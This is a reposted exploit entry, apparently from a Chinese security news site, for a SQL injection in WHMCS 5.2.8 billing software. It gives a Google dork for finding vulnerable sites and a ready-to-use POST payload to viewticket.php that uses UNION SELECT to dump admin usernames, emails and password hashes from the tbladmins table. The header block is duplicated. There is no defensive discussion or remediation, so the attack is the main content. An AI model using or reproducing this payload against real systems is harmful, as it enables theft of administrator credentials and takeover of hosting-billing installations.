WHMCS 5.2.8 - SQL Injection Vulnerability

没穿底裤 2019年12月31日21:19:36评论1,079 views字数 496阅读1分39秒阅读模式
摘要

# Google Dork: "powered by WHMCS"
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8
# Tested on: Windows, Linux

# Google Dork: "powered by WHMCS"
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8
# Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Example:

/whmcs/viewticket.php
[php]
POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#
[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日21:19:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WHMCS 5.2.8 - SQL Injection Vulnerabilityhttps://cn-sec.com/archives/75404.html

发表评论

匿名网友 填写信息